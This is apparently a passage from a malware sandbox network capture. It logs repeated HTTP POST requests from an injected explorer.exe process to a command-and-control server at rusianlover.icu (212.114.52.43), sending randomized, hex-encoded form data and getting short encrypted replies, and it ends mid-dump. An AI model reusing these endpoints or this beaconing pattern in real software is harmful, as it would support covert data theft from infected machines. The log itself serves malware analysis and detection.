Mar 10, 2021 11:43:14.175595045 CET	10113	IN	HTTP/1.1 200 OK Server: nginx/1.10.3 Date: Wed, 10 Mar 2021 10:43:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 36 64 0d 0a 31 99 37 40 6b fa 10 14 3c 32 d0 83 b1 e7 75 5e 8f a7 5e 8b b4 00 84 2f 5a 22 21 e5 06 25 67 c5 70 fc d2 5a fa a1 2e 23 9d 1c 10 c4 a9 7b 3c 30 85 05 33 63 91 fb 03 53 0c 5c 86 4b 18 84 35 56 ba 1f d0 e5 06 4d f7 9e 82 7e 3e a7 f6 a5 46 b7 8f ad 42 6f bc c1 4a 85 49 46 8b 69 19 ff ae b4 39 0b 3d 8d e8 37 4a 09 90 d5 8c 51 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6d17@k<2u^^/Z"!%gpZ.#{<03cS\K5VM~>FBoJIFi9=7JQ0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
18	192.168.2.5	49748	212.114.52.43	80	C:\Windows\SysWOW64\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Mar 10, 2021 11:43:16.929115057 CET	10135	OUT	POST /forum/logout.php?pid=567 HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: rusianlover.icu Content-Length: 646 Cache-Control: no-cache Data Raw: 6c 63 74 6b 62 73 6a 3d 32 32 30 39 31 38 33 35 26 6e 67 7a 73 6c 65 78 71 6a 3d 37 64 30 64 38 35 35 38 38 66 65 66 31 62 66 65 65 61 36 63 64 30 63 34 64 62 36 32 26 70 6b 66 61 76 3d 35 35 31 61 62 31 31 64 63 37 63 33 35 62 61 62 39 35 38 32 33 37 62 61 63 30 39 64 31 66 32 32 66 62 33 33 39 36 61 38 31 34 66 62 38 65 64 64 36 65 66 32 62 34 38 34 61 64 30 61 37 32 37 39 34 33 36 32 31 62 34 38 61 66 36 39 34 32 61 30 35 35 61 37 39 38 63 62 36 36 61 33 63 61 34 38 33 63 63 64 65 30 32 37 31 66 32 36 35 62 38 64 33 38 61 64 30 31 33 32 39 66 39 38 63 39 30 30 36 33 32 30 65 32 30 32 39 32 32 30 66 63 62 38 36 61 38 66 61 33 36 37 39 34 62 33 65 33 39 36 31 65 35 61 33 34 39 65 31 35 63 63 39 33 62 35 31 34 30 34 62 31 32 65 39 37 33 62 38 32 36 32 64 33 66 38 37 65 35 34 34 39 35 35 63 35 38 32 64 32 36 32 33 66 33 31 39 34 39 34 65 39 31 30 63 37 38 30 32 38 38 62 36 64 61 39 34 35 39 37 66 65 39 37 31 33 33 38 65 31 33 63 66 31 35 65 66 31 34 35 34 37 34 62 65 64 35 33 39 33 31 66 35 63 33 30 66 34 38 62 38 34 64 35 62 35 34 61 64 35 38 33 37 32 63 36 32 37 64 65 34 62 61 31 62 36 39 37 30 36 65 31 64 39 38 35 34 31 38 38 33 64 30 38 33 32 34 33 30 33 65 66 35 31 32 31 63 36 38 63 30 33 39 62 36 30 34 34 38 37 37 38 37 31 39 66 32 37 65 37 64 64 34 38 38 31 63 63 32 31 62 32 31 30 30 35 37 62 36 36 36 34 65 36 37 32 33 66 33 65 32 37 66 36 35 31 31 33 36 38 35 65 33 32 31 64 66 30 66 31 62 32 30 63 62 63 61 32 32 36 35 62 35 31 36 32 63 64 61 62 37 33 37 61 39 33 34 64 36 35 39 39 32 36 34 31 37 37 31 62 39 65 61 65 64 65 31 66 61 35 39 37 64 39 32 35 30 32 37 37 31 30 62 33 38 38 37 64 35 31 35 37 38 39 31 62 62 31 31 36 36 39 37 39 66 31 61 65 36 34 62 36 38 35 35 65 35 64 32 63 36 65 36 38 39 62 63 64 34 66 62 39 35 64 37 34 33 65 32 61 64 61 65 66 35 63 34 62 39 62 65 62 34 32 66 34 35 33 65 37 30 35 65 63 35 62 39 31 32 34 62 31 31 62 35 30 38 30 31 61 65 32 64 36 33 65 65 34 62 31 64 39 32 34 Data Ascii: lctkbsj=22091835&ngzslexqj=7d0d85588fef1bfeea6cd0c4db62&pkfav=551ab11dc7c35bab958237bac09d1f22fb3396a814fb8edd6ef2b484ad0a727943621b48af6942a055a798cb66a3ca483ccde0271f265b8d38ad01329f98c9006320e2029220fcb86a8fa36794b3e3961e5a349e15cc93b51404b12e973b8262d3f87e544955c582d2623f319494e910c780288b6da94597fe971338e13cf15ef145474bed53931f5c30f48b84d5b54ad58372c627de4ba1b69706e1d98541883d08324303ef5121c68c039b60448778719f27e7dd4881cc21b210057b6664e6723f3e27f65113685e321df0f1b20cbca2265b5162cdab737a934d65992641771b9eaede1fa597d925027710b3887d5157891bb1166979f1ae64b6855e5d2c6e689bcd4fb95d743e2adaef5c4b9beb42f453e705ec5b9124b11b50801ae2d63ee4b1d924
Mar 10, 2021 11:43:16.998594046 CET	10135	IN	HTTP/1.1 200 OK Server: nginx/1.10.3 Date: Wed, 10 Mar 2021 10:43:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 36 64 0d 0a 9e bb 43 60 0e c7 7a 79 98 7e f0 4c c0 00 4b 58 0a fa 83 99 95 b4 a9 6d 6b f9 ab c8 21 09 59 19 f1 8c 67 d4 3f 0e 3d c6 4c 08 02 19 43 9a 45 cf 23 bd 50 51 c4 57 b2 09 53 fd 8d 57 11 04 6f 57 ff 2a 35 68 26 4d 6e 67 71 f6 91 df 0a c6 82 71 d3 5d f9 13 e8 81 9b eb 2a 82 36 49 71 96 a8 d3 b5 52 ab 57 d4 ad e8 96 02 7b 07 bc 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6dC`zy~LKXmk!Yg?=LCE#PQWSWoW5h&Mngqq]6IqRW{0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
19	192.168.2.5	49749	212.114.52.43	80	C:\Windows\SysWOW64\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Mar 10, 2021 11:43:19.759953976 CET	10137	OUT	POST /forum/logout.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: rusianlover.icu Content-Length: 672 Cache-Control: no-cache Data Raw: 7a 65 64 69 68 6d 6c 71 70 3d 32 34 36 32 31 31 39 37 26 62 69 6a 71 72 3d 31 63 36 35 36 38 63 30 62 35 62 65 38 31 35 38 35 61 34 66 61 64 38 65 35 38 39 38 33 63 63 66 36 34 38 32 35 30 62 30 66 33 33 32 34 64 33 61 35 31 62 31 34 38 26 64 6d 70 79 62 6b 6e 3d 31 34 36 32 34 41 34 39 41 41 33 45 44 43 37 46 32 44 41 34 37 39 35 33 37 30 46 35 38 33 39 39 35 43 46 44 38 33 35 31 41 45 30 41 35 31 43 37 33 30 38 43 34 36 46 41 34 37 32 34 41 34 38 30 32 46 42 31 46 32 42 34 46 42 39 46 35 42 31 44 35 34 45 45 45 34 39 41 44 42 43 30 31 36 45 31 30 46 30 45 32 45 37 36 43 45 39 32 45 39 46 46 42 45 38 31 33 39 36 37 43 43 34 34 32 41 39 42 39 46 30 37 32 44 36 38 32 38 39 45 44 45 44 35 39 35 39 32 43 32 38 31 34 37 43 33 39 44 32 41 34 37 30 37 37 30 46 45 30 30 35 44 39 33 34 32 30 35 34 37 35 37 42 38 44 31 35 42 35 34 46 42 37 41 43 45 37 43 43 35 33 38 32 35 46 31 32 38 35 35 41 45 46 34 32 38 35 44 34 39 35 45 44 35 38 45 39 44 39 33 45 38 30 42 36 35 41 32 39 31 35 43 36 34 33 39 33 32 33 46 32 42 45 32 43 32 33 45 44 39 38 32 30 35 34 33 46 39 31 43 44 45 30 34 37 31 44 43 37 37 34 34 39 43 39 44 31 36 44 34 35 36 46 42 32 30 46 39 42 44 37 34 41 44 31 39 35 35 31 37 31 39 46 33 31 45 46 44 31 30 33 32 42 32 38 36 38 31 46 37 46 46 42 33 41 36 34 30 42 30 37 42 33 43 45 30 33 37 31 41 42 43 35 30 38 38 30 46 39 31 41 46 41 32 39 36 32 32 44 31 44 43 36 45 38 41 36 39 38 34 36 39 37 30 45 37 35 37 30 45 39 42 46 32 33 38 33 33 37 32 45 41 45 43 36 32 35 35 44 35 45 31 43 39 35 45 44 45 42 32 31 38 39 45 36 35 33 32 35 32 45 41 31 41 30 33 42 45 31 37 30 32 36 31 45 39 41 37 32 33 34 35 41 31 35 43 31 32 46 42 38 36 44 36 38 31 31 42 35 46 31 43 33 33 37 46 34 42 44 41 41 43 37 39 42 42 41 42 41 46 32 35 41 37 33 43 43 44 32 42 38 44 38 31 42 30 34 43 38 33 44 34 38 34 35 41 41 31 45 45 44 42 30 41 38 36 46 37 41 37 38 39 36 32 30 34 44 33 32 37 32 34 30 46 36 32 41 43 43 35 35 35 34 43 36 35 37 43 32 36 31 41 45 42 43 45 34 42 43 41 45 33 30 41 30 34 36 36 37 34 45 44 44 34 Data Ascii: zedihmlqp=24621197&bijqr=1c6568c0b5be81585a4fad8e58983ccf648250b0f3324d3a51b148&dmpybkn=14624A49AA3EDC7F2DA4795370F583995CFD8351AE0A51C7308C46FA4724A4802FB1F2B4FB9F5B1D54EEE49ADBC016E10F0E2E76CE92E9FFBE813967CC442A9B9F072D68289EDED59592C28147C39D2A470770FE005D9342054757B8D15B54FB7ACE7CC53825F12855AEF4285D495ED58E9D93E80B65A2915C6439323F2BE2C23ED9820543F91CDE0471DC77449C9D16D456FB20F9BD74AD19551719F31EFD1032B28681F7FFB3A640B07B3CE0371ABC50880F91AFA29622D1DC6E8A69846970E7570E9BF2383372EAEC6255D5E1C95EDEB2189E653252EA1A03BE170261E9A72345A15C12FB86D6811B5F1C337F4BDAAC79BBABAF25A73CCD2B8D81B04C83D4845AA1EEDB0A86F7A7896204D327240F62ACC5554C657C261AEBCE4BCAE30A046674EDD4
Mar 10, 2021 11:43:19.829962969 CET	10137	IN	HTTP/1.1 200 OK Server: nginx/1.10.3 Date: Wed, 10 Mar 2021 10:43:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 36 64 0d 0a e4 1a 09 76 8b 0e 93 7a 8a b9 a8 91 e3 81 7b 3a 98 d2 7a 59 d5 67 5b 98 05 ac c6 27 42 aa 50 3f b4 04 69 cb e4 5b 2e 34 d1 85 ab a8 b9 30 53 77 46 c3 95 78 61 20 ab e5 4d 9b fa b1 01 b4 78 af e9 58 6a 76 52 da 88 92 8f 91 f8 82 f0 e8 55 af 8d 75 11 3b 97 db 36 63 67 4b 48 bd 7f 0c c4 92 23 52 bc 34 e9 79 63 c2 1f 3f a4 84 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6dvz{:zYg['BP?i[.40SwFxa MxXjvRUu;6cgKH#R4yc?0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.5	49718	212.114.52.43	80	C:\Windows\SysWOW64\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Mar 10, 2021 11:42:33.676134109 CET	1218	OUT	POST /forum/logout.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: rusianlover.icu Content-Length: 4727 Cache-Control: no-cache
Mar 10, 2021 11:42:33.756139994 CET	1223	IN	HTTP/1.1 200 OK Server: nginx/1.10.3 Date: Wed, 10 Mar 2021 10:42:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 36 64 0d 0a c9 13 08 1f b9 f9 dd 54 61 ae dd a2 49 aa 86 e1 94 bd e0 90 83 0f fa fe bb b6 06 f3 57 07 eb d2 8e 2f 3a e5 53 6c b8 34 5a 2d 8f 03 df 47 5a e1 e6 26 47 74 bc 69 49 1b f9 da bf fd f6 ea 53 54 d7 77 64 30 48 3b 35 50 1b 9f 93 ae 20 24 94 4e 87 bc 93 10 e4 3c 45 c6 9a 3e 4c 5c 10 e5 01 a8 20 a9 c4 16 e4 a5 8d 06 48 ee c1 42 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6dTaIW/:Sl4Z-GZ&GtiISTwd0H;5P $N<E>L\ HB0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
20	192.168.2.5	49750	212.114.52.43	80	C:\Windows\SysWOW64\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Mar 10, 2021 11:43:23.035320997 CET	10139	OUT	POST /forum/logout.php?id=9292886 HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: rusianlover.icu Content-Length: 655 Cache-Control: no-cache Data Raw: 66 6b 76 61 66 3d 31 39 36 61 39 66 31 38 32 35 62 30 32 37 39 61 62 66 33 65 35 31 34 64 35 63 31 31 62 37 33 39 65 66 63 36 66 36 26 64 67 70 73 76 65 68 6b 74 3d 38 33 30 36 30 35 37 26 68 6f 62 69 70 63 6a 3d 35 38 66 31 35 33 33 62 63 38 33 66 62 32 38 33 66 65 64 32 34 63 66 37 36 64 65 38 37 62 63 62 65 39 36 36 39 36 62 35 63 30 61 38 34 32 30 63 37 38 37 63 35 30 30 63 34 64 63 63 61 30 62 39 39 66 61 33 30 39 38 63 34 62 32 34 35 61 36 66 30 33 31 66 66 61 38 35 39 31 64 66 64 61 63 37 37 37 61 37 33 30 35 61 61 65 36 66 38 61 39 34 62 66 62 62 62 35 35 62 63 36 32 66 64 65 65 65 35 36 35 33 66 32 37 66 34 63 35 32 66 66 66 31 66 30 33 65 30 64 63 63 38 66 39 34 33 63 35 36 31 39 36 32 30 31 39 32 39 32 37 64 37 63 37 66 31 33 30 33 34 62 33 34 65 63 33 63 34 30 32 31 33 39 35 62 63 33 37 31 65 63 65 64 63 37 65 31 36 61 66 64 65 31 39 35 63 34 35 63 64 63 38 66 64 61 63 34 64 37 61 35 35 32 36 66 65 33 64 63 31 62 64 38 37 65 36 33 61 39 38 66 66 31 32 63 37 32 65 63 38 32 35 65 62 61 39 35 38 35 31 38 62 33 38 31 33 63 38 39 31 63 32 61 39 37 34 34 30 39 35 34 37 62 31 65 62 32 65 32 35 37 37 37 30 63 64 33 36 39 65 64 37 31 34 62 32 63 62 37 33 61 32 34 31 66 34 64 30 62 36 31 65 64 36 34 65 32 33 31 32 34 30 63 38 64 61 66 36 66 33 34 61 65 30 37 32 33 66 64 39 36 63 61 39 38 31 39 39 64 31 64 62 30 34 30 35 35 35 66 31 66 66 33 63 63 37 65 34 35 61 38 63 39 64 33 33 31 66 34 32 39 64 39 31 39 63 64 65 30 37 62 34 66 32 31 61 35 63 64 31 34 66 37 61 36 38 35 31 39 32 63 37 38 64 37 38 63 37 37 63 35 38 66 66 34 30 61 33 62 34 38 32 36 34 36 37 61 66 34 63 36 33 32 37 38 65 37 63 32 61 39 34 37 30 63 61 30 66 37 30 38 36 34 37 34 39 65 61 38 66 66 35 32 32 33 66 32 36 62 64 62 65 63 32 64 39 65 30 34 33 61 32 30 37 36 62 66 62 61 35 38 65 35 32 63 36 32 32 33 39 61 65 32 32 63 61 61 30 34 39 32 35 64 31 38 36 37 33 35 31 63 37 37 35 30 33 65 34 33 32 34 37 34 33 31 34 64 32 36 30 63 39 32 62 34 65 30 62 63 37 61 39 33 Data Ascii: fkvaf=196a9f1825b0279abf3e514d5c11b739efc6f6&dgpsvehkt=8306057&hobipcj=58f1533bc83fb283fed24cf76de87bcbe96696b5c0a8420c787c500c4dcca0b99fa3098c4b245a6f031ffa8591dfdac777a7305aae6f8a94bfbbb55bc62fdeee5653f27f4c52fff1f03e0dcc8f943c5619620192927d7c7f13034b34ec3c4021395bc371ecedc7e16afde195c45cdc8fdac4d7a5526fe3dc1bd87e63a98ff12c72ec825eba958518b3813c891c2a974409547b1eb2e257770cd369ed714b2cb73a241f4d0b61ed64e231240c8daf6f34ae0723fd96ca98199d1db040555f1ff3cc7e45a8c9d331f429d919cde07b4f21a5cd14f7a685192c78d78c77c58ff40a3b4826467af4c63278e7c2a9470ca0f70864749ea8ff5223f26bdbec2d9e043a2076bfba58e52c62239ae22caa04925d1867351c77503e432474314d260c92b4e0bc7a93
Mar 10, 2021 11:43:23.106848955 CET	10139	IN	HTTP/1.1 200 OK Server: nginx/1.10.3 Date: Wed, 10 Mar 2021 10:43:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 36 64 0d 0a b7 6a 92 54 94 48 8f 05 13 28 90 ce b9 27 a7 b5 34 13 8c a3 7c 7c 48 79 2b ba 9a c8 f5 45 2a 48 3f 23 f0 1d 87 1a 48 37 28 6a 44 02 2a 4f bb fc 79 11 3f 78 fc 57 70 2d 43 7a d6 63 ae 84 1b ee 52 2c 58 f9 72 6c 53 67 af 9f 5a 8d f9 e0 97 44 1a 1b 1a a5 07 6e 17 c8 0b 2c 9d f9 60 07 dd 9c 20 f6 c1 ce 56 6f a7 b1 62 fb a6 f3 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6djTH('4\|\|Hy+EH?#H7(jDOy?xWp-CzcR,XrlSgZDn,` Vob0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
21	192.168.2.5	49751	212.114.52.43	80	C:\Windows\SysWOW64\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Mar 10, 2021 11:43:26.019125938 CET	10141	OUT	POST /forum/logout.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: rusianlover.icu Content-Length: 641 Cache-Control: no-cache Data Raw: 73 6b 63 75 3d 61 66 39 61 30 30 39 64 31 31 32 38 31 65 65 61 39 30 32 32 39 33 64 36 39 31 26 71 67 77 6d 63 73 69 79 3d 39 38 31 31 38 34 30 36 26 75 6f 69 63 77 71 3d 34 62 65 36 34 38 66 30 36 62 33 64 31 62 36 37 30 30 35 39 38 32 39 66 63 37 32 38 64 66 35 63 65 65 63 33 31 63 31 37 35 64 65 61 63 33 31 32 37 66 39 38 65 39 63 62 30 61 36 30 65 32 36 66 36 63 36 63 31 38 38 34 33 39 35 39 31 32 61 64 38 64 62 32 36 65 62 64 39 31 39 36 30 32 33 64 39 35 62 35 39 64 61 38 62 65 62 38 35 35 62 62 62 30 63 37 30 32 33 32 34 66 37 63 66 65 66 62 66 36 36 65 31 34 65 35 32 62 34 34 37 66 65 36 34 64 62 32 63 64 34 30 36 34 64 34 31 65 39 61 31 61 38 37 39 30 30 66 64 62 62 64 38 33 36 32 61 62 36 62 33 64 39 65 39 65 30 32 36 63 34 30 32 37 37 30 64 61 64 62 65 32 30 35 63 38 61 66 61 65 38 64 36 61 38 31 34 63 66 30 64 37 37 32 34 34 61 36 30 62 34 35 63 32 37 62 62 61 62 65 61 32 62 36 62 33 65 38 61 36 30 64 66 37 33 33 39 65 62 32 66 62 30 37 31 36 32 34 64 65 38 61 33 61 33 34 38 33 64 64 64 34 32 38 30 64 33 33 65 32 31 36 63 33 30 62 39 34 35 61 36 30 32 64 65 65 64 36 65 66 30 62 32 65 36 38 61 31 31 30 38 33 34 30 35 63 64 30 36 30 65 66 62 31 64 64 61 33 30 30 64 38 66 65 36 36 64 62 63 31 35 32 64 34 38 35 63 30 62 30 37 66 64 32 64 34 36 64 63 30 65 33 66 30 36 32 37 39 39 39 39 31 64 33 33 38 30 62 63 32 37 65 32 35 33 65 34 35 31 31 35 31 32 31 64 38 37 32 37 61 31 31 61 30 31 33 66 39 32 66 33 36 65 30 66 35 38 33 65 65 64 64 36 37 33 62 33 61 36 66 32 37 62 36 32 39 31 32 35 34 38 33 35 36 61 32 61 39 30 36 64 38 31 35 66 39 62 33 33 34 62 66 31 65 38 33 31 61 62 37 64 35 30 35 32 62 32 65 35 61 63 36 61 33 37 30 34 39 31 66 64 62 30 38 37 61 35 61 39 38 32 32 30 63 61 63 39 63 64 62 36 63 38 39 65 35 32 32 30 63 32 61 37 33 61 33 30 30 66 34 39 36 31 33 37 39 39 62 33 61 63 62 38 36 34 66 31 35 38 33 65 64 65 65 65 36 32 38 66 61 37 65 64 30 65 66 39 61 32 35 30 32 34 66 Data Ascii: skcu=af9a009d11281eea902293d691&qgwmcsiy=98118406&uoicwq=4be648f06b3d1b670059829fc728df5ceec31c175deac3127f98e9cb0a60e26f6c6c1884395912ad8db26ebd9196023d95b59da8beb855bbb0c702324f7cfefbf66e14e52b447fe64db2cd4064d41e9a1a87900fdbbd8362ab6b3d9e9e026c402770dadbe205c8afae8d6a814cf0d77244a60b45c27bbabea2b6b3e8a60df7339eb2fb071624de8a3a3483ddd4280d33e216c30b945a602deed6ef0b2e68a11083405cd060efb1dda300d8fe66dbc152d485c0b07fd2d46dc0e3f062799991d3380bc27e253e45115121d8727a11a013f92f36e0f583eedd673b3a6f27b62912548356a2a906d815f9b334bf1e831ab7d5052b2e5ac6a370491fdb087a5a98220cac9cdb6c89e5220c2a73a300f49613799b3acb864f1583edeee628fa7ed0ef9a25024f
Mar 10, 2021 11:43:26.088395119 CET	10141	IN	HTTP/1.1 200 OK Server: nginx/1.10.3 Date: Wed, 10 Mar 2021 10:43:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 36 64 0d 0a cd 16 a1 1f 31 bf 87 23 f5 d3 d2 27 dc 9f a5 c1 44 77 69 21 fc 32 4f bc b3 cb 1b aa 65 15 e3 a0 aa 36 ec 55 be 6e 6c e1 b0 48 3d 65 49 a4 8a ff ba 55 21 9e 1e 33 23 ba 23 cc fd b9 1c 34 e5 76 4f 5b 59 67 20 03 ab ae de 22 0c c2 39 a4 da b4 96 ee 89 d5 33 86 8e c9 50 18 fb 8f 3b 15 2f 71 a8 b5 f6 3e 1a 17 d4 70 2c 59 dc 9e 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6d1#'Dwi!2Oe6UnlH=eIU!3##4vO[Yg "93P;/q>p,Y0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
22	192.168.2.5	49752	212.114.52.43	80	C:\Windows\SysWOW64\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Mar 10, 2021 11:43:28.839087963 CET	10143	OUT	POST /forum/logout.php?id=8085154 HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: rusianlover.icu Content-Length: 671 Cache-Control: no-cache Data Raw: 65 6f 73 63 67 71 3d 39 32 37 39 39 32 35 34 26 67 73 79 6b 71 63 69 75 3d 32 39 41 35 41 46 39 32 33 45 43 33 36 36 33 44 46 39 46 34 46 31 36 36 33 33 39 30 38 31 39 46 31 39 41 43 46 37 32 39 44 46 31 33 32 42 42 31 30 41 44 30 34 42 32 38 26 69 77 65 73 3d 64 35 34 66 33 32 31 62 36 31 61 35 30 30 64 61 32 34 30 31 65 38 30 34 61 36 38 31 36 61 38 36 37 61 62 39 62 37 63 37 65 37 64 36 62 33 65 34 64 66 30 31 30 37 32 64 38 39 64 31 62 39 37 63 65 31 61 62 61 32 64 36 36 33 30 64 33 38 32 62 35 66 30 38 38 64 34 38 33 66 62 64 34 34 34 61 38 65 34 34 30 65 61 64 63 34 38 33 65 32 62 36 61 31 64 36 31 36 34 65 39 34 39 39 64 61 34 61 33 65 33 63 30 39 38 34 64 32 65 64 62 63 66 62 33 35 62 66 35 38 39 30 61 39 33 65 30 32 38 61 39 33 30 62 61 33 36 39 35 30 32 35 32 33 62 37 65 36 35 62 66 65 32 38 63 33 66 35 63 36 30 63 32 63 64 31 31 30 65 66 34 39 34 61 33 37 64 65 39 31 61 33 36 64 64 31 65 63 36 62 66 61 32 63 32 34 35 65 63 64 65 37 63 30 65 38 61 32 61 35 30 30 33 62 36 32 34 36 37 63 35 66 65 63 30 36 32 62 63 62 31 63 37 38 61 65 38 66 64 32 38 34 66 61 66 39 32 39 32 66 30 31 64 62 31 65 65 38 30 64 62 36 61 38 37 35 38 65 65 61 33 64 34 38 34 38 39 63 36 34 39 35 66 62 37 39 31 30 64 66 61 33 39 39 61 63 32 32 61 39 39 63 39 39 37 62 33 35 36 33 38 34 64 63 31 35 39 30 37 34 31 64 35 62 66 38 38 65 62 31 63 31 62 65 65 35 32 32 65 65 62 35 30 36 34 31 39 63 66 38 37 30 35 31 35 33 62 37 65 31 64 64 63 38 36 36 35 36 66 32 35 34 61 36 31 64 64 64 38 35 65 33 38 38 39 61 35 39 37 66 33 63 31 63 34 62 31 35 64 37 33 37 38 39 39 31 39 65 38 62 62 38 37 65 31 37 36 36 35 35 37 39 65 33 61 36 35 35 37 64 61 65 30 61 37 36 37 34 33 34 39 36 64 33 64 63 31 61 61 34 65 30 36 38 62 36 34 39 63 32 64 65 62 30 61 30 37 66 34 62 63 39 36 36 65 36 35 32 32 65 61 32 38 35 30 32 33 36 38 38 34 30 65 35 31 62 34 34 34 33 66 65 32 65 38 35 63 32 65 31 32 37 34 62 64 39 39 36 64 31 64 34 66 38 30 65 61 33 30 65 30 32 30 64 39 65 62 35 32 38 39 33 31 34 30 30 62 62 35 66 39 36 66 31 Data Ascii: eoscgq=92799254&gsykqciu=29A5AF923EC3663DF9F4F1663390819F19ACF729DF132BB10AD04B28&iwes=d54f321b61a500da2401e804a6816a867ab9b7c7e7d6b3e4df01072d89d1b97ce1aba2d6630d382b5f088d483fbd444a8e440eadc483e2b6a1d6164e9499da4a3e3c0984d2edbcfb35bf5890a93e028a930ba369502523b7e65bfe28c3f5c60c2cd110ef494a37de91a36dd1ec6bfa2c245ecde7c0e8a2a5003b62467c5fec062bcb1c78ae8fd284faf9292f01db1ee80db6a8758eea3d48489c6495fb7910dfa399ac22a99c997b356384dc1590741d5bf88eb1c1bee522eeb506419cf8705153b7e1ddc86656f254a61ddd85e3889a597f3c1c4b15d73789919e8bb87e17665579e3a6557dae0a76743496d3dc1aa4e068b649c2deb0a07f4bc966e6522ea28502368840e51b4443fe2e85c2e1274bd996d1d4f80ea30e020d9eb528931400bb5f96f1
Mar 10, 2021 11:43:28.909027100 CET	10143	IN	HTTP/1.1 200 OK Server: nginx/1.10.3 Date: Wed, 10 Mar 2021 10:43:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 36 64 0d 0a 5b 29 cc 38 24 a5 ca 5a 73 5a 5c f8 ed 64 01 61 7e 35 a7 18 aa b4 a2 77 58 38 f5 1b 94 a9 21 e5 98 5a 9c ec 36 45 61 56 cb 57 42 06 b9 a1 af ac 3f 58 6d b4 f8 7c 5a e9 5d 65 3a 17 ac aa fe d5 c8 fd c3 d7 ee d1 52 74 ee af a2 d4 62 20 e4 3b b4 3e c8 f0 65 37 1d 04 f9 f9 cd 1b 22 c3 e1 88 35 fc b3 66 7a 38 3d 2a 57 53 53 c5 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6d[)8$ZsZ\da~5wX8!Z6EaVWB?Xm\|Z]e:Rtb ;>e7"5fz8=*WSS0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
23	192.168.2.5	49755	212.114.52.43	80	C:\Windows\SysWOW64\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Mar 10, 2021 11:43:31.647181034 CET	10161	OUT	POST /forum/logout.php?id=5263631 HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: rusianlover.icu Content-Length: 669 Cache-Control: no-cache Data Raw: 6d 79 71 63 3d 30 65 61 31 64 65 61 62 37 63 65 34 62 66 32 39 31 35 31 65 33 63 35 37 64 33 34 61 34 66 65 66 33 30 39 31 34 34 35 38 30 62 30 64 35 64 63 31 38 62 37 34 61 31 26 6b 75 6b 75 6b 75 6b 75 3d 38 30 34 34 34 39 37 34 26 6f 63 77 6b 65 73 3d 42 33 46 38 39 35 35 39 32 41 44 34 30 31 43 31 41 44 38 38 45 45 34 42 45 36 30 46 31 30 30 46 45 43 35 46 36 30 34 30 38 41 31 31 36 44 45 33 45 32 31 44 46 37 36 39 45 34 43 37 41 36 33 43 41 36 44 38 39 44 39 35 30 42 32 33 30 39 37 41 45 44 36 34 38 34 42 34 39 38 43 45 45 46 45 31 36 35 34 37 32 37 39 30 36 42 43 34 37 31 31 32 44 37 46 43 35 46 31 30 45 33 45 37 41 45 45 39 32 34 33 42 33 42 35 43 34 42 41 45 39 39 39 37 34 41 44 43 31 31 36 34 33 32 30 42 43 39 41 35 38 45 31 44 45 37 37 38 39 41 36 36 46 46 32 32 45 32 31 31 31 45 31 39 39 46 42 32 42 33 41 30 30 36 39 32 31 35 43 43 31 43 34 33 43 31 30 46 32 32 46 43 43 37 32 36 43 33 39 30 43 33 44 36 35 41 46 36 46 37 32 46 44 33 42 31 35 37 33 42 39 35 34 39 30 44 30 37 43 37 30 35 44 46 45 38 42 30 38 44 45 46 46 32 44 31 43 39 31 39 45 42 31 44 33 44 34 34 43 46 38 38 31 31 45 31 42 31 39 32 32 33 35 43 41 45 37 38 37 35 44 46 33 42 41 34 35 34 30 35 43 43 46 46 39 33 32 33 38 44 30 38 37 36 36 30 41 37 46 44 34 30 45 38 44 43 36 41 33 31 44 33 39 31 32 43 44 42 46 37 32 38 46 45 30 45 44 43 37 38 37 46 41 34 39 33 46 38 38 31 46 34 39 39 33 41 31 46 31 44 35 34 44 42 36 35 33 36 36 